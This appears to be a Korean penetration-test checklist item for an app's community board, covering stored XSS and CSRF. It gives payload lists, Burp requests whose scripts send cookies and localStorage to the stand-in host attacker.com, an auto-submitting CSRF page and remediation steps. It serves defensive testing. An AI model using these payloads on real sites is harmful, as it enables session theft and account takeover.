================================================================================
[VCE-CM-01] XSS/CSRF 공격 가능성
도메인: community
위험도: Critical
================================================================================

1. 진단 항목 개요
--------------------------------------------------------------------------------
크로스 사이트 스크립팅(XSS)은 공격자가 악의적인 스크립트를 게시글 등 사용자
입력 필드에 삽입하고, 다른 사용자가 해당 콘텐츠를 조회할 때 브라우저에서
스크립트가 실행되는 취약점이다.

VCE 커뮤니티는 CommunityDetail.tsx:323에서 dangerouslySetInnerHTML을 사용하여
게시글 content를 렌더링하고 있으며, 별도의 HTML 이스케이프 처리나 DOMPurify
같은 새니타이저 적용이 없다. 이는 Stored XSS(저장형 XSS)가 확정된 상태이다.

CSRF(Cross-Site Request Forgery)는 인증된 사용자의 브라우저를 통해 공격자가
의도한 요청을 강제로 실행시키는 공격이다. 게시글 작성/수정/삭제 API에 CSRF
토큰이 없어 동일한 위험이 존재한다.

취약점 유형:
  - Stored XSS (확정)
  - DOM-based XSS
  - CSRF (게시글 작성/수정/삭제)

영향 범위:
  - 세션 쿠키 탈취 → 계정 탈취
  - 관리자 계정 탈취 시 전체 서비스 장악
  - 악성 스크립트 배포 (드라이브 바이 다운로드)
  - 피싱 페이지 리다이렉트


2. 대상 기능 & 엔드포인트
--------------------------------------------------------------------------------
대상 기능:
  - 게시글 작성 (content 필드)
  - 게시글 조회 (dangerouslySetInnerHTML 렌더링)
  - 댓글 작성 (content 필드)

주요 엔드포인트:
  POST   /api/community/posts          - 게시글 작성
  GET    /api/community/posts/{id}     - 게시글 조회
  PUT    /api/community/posts/{id}     - 게시글 수정
  POST   /api/community/posts/{id}/comments  - 댓글 작성
  GET    /api/community/posts/{id}/comments  - 댓글 조회

프론트엔드 접근 URL:
  로컬:   http://localhost:5173/community/{id}
  운영:   https://exchange.vceapp.com/community/{id}

백엔드 API:
  로컬:   http://localhost:8080
  운영:   https://vceapp.com


3. 취약점 원리 (Why this works)
--------------------------------------------------------------------------------
[Stored XSS 원리]
React의 dangerouslySetInnerHTML은 HTML을 그대로 DOM에 삽입한다. 일반적인
JSX 렌더링({post.content})은 자동으로 이스케이프 처리를 하지만,
dangerouslySetInnerHTML={{ __html: post.content }}는 이 보호를 명시적으로
우회한다.

공격 흐름:
  1. 공격자가 content에 <script>alert(document.cookie)</script> 포함한 게시글 작성
  2. 서버는 HTML 이스케이프 없이 DB에 원문 그대로 저장
  3. 피해자가 해당 게시글 URL 접근
  4. React가 dangerouslySetInnerHTML로 content 렌더링
  5. 브라우저가 <script> 태그 실행
  6. document.cookie 탈취 → 공격자 서버로 전송

[CSRF 원리]
JWT 토큰이 쿠키에 저장되고 SameSite=None 혹은 미설정인 경우, 타 도메인에서
전송된 요청에도 쿠키가 자동 첨부된다. CSRF 토큰이 없으면 공격자 사이트에서
피해자의 브라우저를 통해 게시글 작성 요청을 강제 실행할 수 있다.


4. 테스트 절차 (Step-by-step)
--------------------------------------------------------------------------------

[STEP 1] 기본 XSS 페이로드 삽입 테스트
  1-1. 브라우저에서 http://localhost:5173 접속 후 test@vce.com / test1234로 로그인
  1-2. 게시글 작성 페이지로 이동
  1-3. 제목: "XSS 테스트"
  1-4. content 필드에 아래 페이로드 입력 후 저장

페이로드 1 - 기본 script 태그:
  <script>alert(document.cookie)</script>

페이로드 2 - img onerror 이벤트:
  <img src=x onerror="alert(document.cookie)">

페이로드 3 - SVG onload:
  <svg onload="alert(document.cookie)">

페이로드 4 - 이벤트 핸들러 다양화:
  <body onload=alert(1)>
  <iframe onload=alert(1)>
  <video><source onerror="alert(1)">

페이로드 5 - 인코딩 우회:
  <scr&#x69;pt>alert(1)</scr&#x69;pt>
  <img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

[STEP 2] Burp Suite를 이용한 직접 HTTP 요청 삽입

Burp Suite 설정:
  - Proxy > Intercept 활성화
  - 브라우저 프록시: 127.0.0.1:8080 (Burp 기본 포트)
  - 게시글 작성 요청 캡처 후 Repeater로 전송

Burp Repeater - 게시글 작성 요청 (기본 XSS):
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...
Cookie: accessToken=eyJhbGciOiJIUzI1NiJ9...

{
  "title": "XSS 테스트 게시글",
  "content": "<script>alert(document.cookie)</script>",
  "categoryId": 1
}
------------------------------------------------------------------------

Burp Repeater - 쿠키 탈취 페이로드:
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...

{
  "title": "공지사항 확인 필요",
  "content": "<script>fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie))</script>",
  "categoryId": 1
}
------------------------------------------------------------------------

Burp Repeater - img onerror 쿠키 탈취:
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...

{
  "title": "이미지 테스트",
  "content": "<img src=x onerror=\"document.location='https://attacker.com/steal?c='+document.cookie\">",
  "categoryId": 1
}
------------------------------------------------------------------------

[STEP 3] 댓글을 통한 Stored XSS 테스트

Burp Repeater - 댓글 XSS:
------------------------------------------------------------------------
POST /api/community/posts/1/comments HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...

{
  "content": "<svg onload=\"fetch('https://attacker.com?c='+document.cookie)\">"
}
------------------------------------------------------------------------

[STEP 4] CSRF 테스트

4-1. 공격자 서버(또는 로컬 HTML 파일)에 아래 CSRF PoC 페이지 작성:

------------------------------------------------------------------------
<!-- csrf_poc.html -->
<html>
<body onload="document.forms[0].submit()">
  <form action="http://localhost:8080/api/community/posts" method="POST"
        enctype="application/json">
    <input type="hidden" name="title" value="CSRF로 작성된 게시글">
    <input type="hidden" name="content" value="공격자가 대신 작성함">
    <input type="hidden" name="categoryId" value="1">
  </form>
</body>
</html>
------------------------------------------------------------------------

4-2. test@vce.com으로 로그인된 브라우저에서 csrf_poc.html 열기
4-3. 자동으로 게시글이 작성되면 CSRF 취약점 확정

[STEP 5] LocalStorage/SessionStorage 탈취 시도

페이로드 - localStorage 전체 탈취:
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...

{
  "title": "공지",
  "content": "<script>var d=JSON.stringify(localStorage);fetch('https://attacker.com/ls?d='+encodeURIComponent(d))</script>",
  "categoryId": 1
}
------------------------------------------------------------------------

[STEP 6] 관리자 계정 대상 공격 시뮬레이션

6-1. admin@vce.com / admin1234로 로그인
6-2. 공격자가 작성한 XSS 페이로드 게시글 URL을 관리자에게 전달
6-3. 관리자 쿠키/토큰 탈취 여부 확인 (attacker.com 로그 확인)


5. 취약 여부 판단 기준
--------------------------------------------------------------------------------
취약 (아래 중 하나라도 해당):
  - alert() 팝업이 실제로 실행됨
  - onerror, onload 등 이벤트 핸들러가 실행됨
  - 외부 서버에 쿠키/토큰 값이 전달됨
  - 스크립트 실행 후 리다이렉트 발생
  - 게시글 내 <script> 태그가 DOM에 그대로 렌더링됨 (개발자도구 확인)
  - CSRF PoC 페이지를 통해 의도치 않은 게시글이 작성됨

안전 (아래 모두 해당 시):
  - <script> 태그가 &lt;script&gt;로 이스케이프 처리됨
  - alert() 팝업이 실행되지 않음
  - Content-Security-Policy 헤더가 응답에 포함됨
  - CSRF 토큰이 요청에 필요하고, 없으면 403 반환


6. 예상 취약 포인트 (코드 위치)
--------------------------------------------------------------------------------
파일: frontend/src/pages/community/CommunityDetail.tsx
라인: 323

취약 코드:
  <div dangerouslySetInnerHTML={{ __html: post.content }} />

문제점:
  - DOMPurify.sanitize() 등 HTML 새니타이저 미적용
  - React 기본 이스케이프 보호를 dangerouslySetInnerHTML로 명시적 우회
  - CSP(Content-Security-Policy) 헤더 미설정으로 인라인 스크립트 실행 가능

관련 파일:
  - frontend/src/pages/community/CommunityDetail.tsx (XSS 발생 지점)
  - backend/src/main/java/...SecurityConfig.java (CSP 헤더 미설정)
  - backend/src/main/java/...CommunityController.java (CSRF 토큰 검증 없음)


7. 권고 조치
--------------------------------------------------------------------------------
[XSS 대응]
1. DOMPurify 라이브러리 적용 (즉시 적용 권고)
   npm install dompurify @types/dompurify

   // CommunityDetail.tsx:323 수정
   import DOMPurify from 'dompurify';
   <div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(post.content) }} />

2. 가능하면 dangerouslySetInnerHTML 제거 후 마크다운 렌더러로 전환
   npm install react-markdown remark-gfm

3. CSP 헤더 설정 (SecurityConfig.java)
   .headers(headers -> headers
     .contentSecurityPolicy("default-src 'self'; script-src 'self'; object-src 'none'")
   )

[CSRF 대응]
1. Spring Security CSRF 보호 활성화
   // SecurityConfig.java에서 csrf().disable() 제거
   .csrf(csrf -> csrf
     .csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse())
   )

2. SameSite=Strict 쿠키 설정
   Cookie: accessToken=...; SameSite=Strict; HttpOnly; Secure

[백엔드 대응]
1. 게시글 저장 전 서버 사이드 HTML 이스케이프 처리
   import org.springframework.web.util.HtmlUtils;
   String safeContent = HtmlUtils.htmlEscape(post.getContent());

================================================================================
